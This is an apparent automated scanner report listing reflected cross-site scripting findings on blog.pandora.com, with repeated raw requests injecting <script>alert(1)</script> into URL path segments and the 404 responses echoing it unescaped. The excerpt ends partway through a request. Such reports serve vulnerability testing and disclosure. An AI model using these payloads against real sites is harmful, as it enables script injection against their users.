GET /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)</script>4f85795b56c/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)</script>e8c0ddecb85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad931d<script>alert(1)</script>e8c0ddecb85/archives/2010/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)</script>2807d91ee1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives1b9c8<script>alert(1)</script>2807d91ee1e/2010/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)</script>d41b3d7ead was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010e09c9<script>alert(1)</script>d41b3d7ead/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)</script>bcd7c444884 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)</script>bcd7c444884/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)</script>b06104d0963 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9c939<script>alert(1)</script>b06104d0963/archives/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)</script>474a0312c0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesb40c4<script>alert(1)</script>474a0312c0d/2010/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)</script>1c5a4ab29c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010aa222<script>alert(1)</script>1c5a4ab29c9/08/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)</script>2b965e1ed52 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0879622<script>alert(1)</script>2b965e1ed52/be-part-of-a-pa.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)</script>8f9246aff15 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/08/be-part-of-a-pa.html39457<script>alert(1)</script>8f9246aff15 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)</script>ae77c2b93bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora92883<script>alert(1)</script>ae77c2b93bf/archives/2010/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)</script>0f0e93964d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0526<script>alert(1)</script>0f0e93964d2/2010/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)</script>4497e666453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201068e05<script>alert(1)</script>4497e666453/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)</script>866bd41379a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)</script>866bd41379a/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)</script>dd84e5ab0d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora88323<script>alert(1)</script>dd84e5ab0d7/archives/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)</script>ee6bc22579c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescd772<script>alert(1)</script>ee6bc22579c/2010/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)</script>0057edf899 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010244d1<script>alert(1)</script>0057edf899/09/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)</script>b33c32116fb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/0980718<script>alert(1)</script>b33c32116fb/tim-on-cnbc-1.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)</script>db22de039d1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:46 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/09/tim-on-cnbc-1.html7f010<script>alert(1)</script>db22de039d1 was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)</script>ab4f3aefded was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6a980<script>alert(1)</script>ab4f3aefded/archives/2010/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
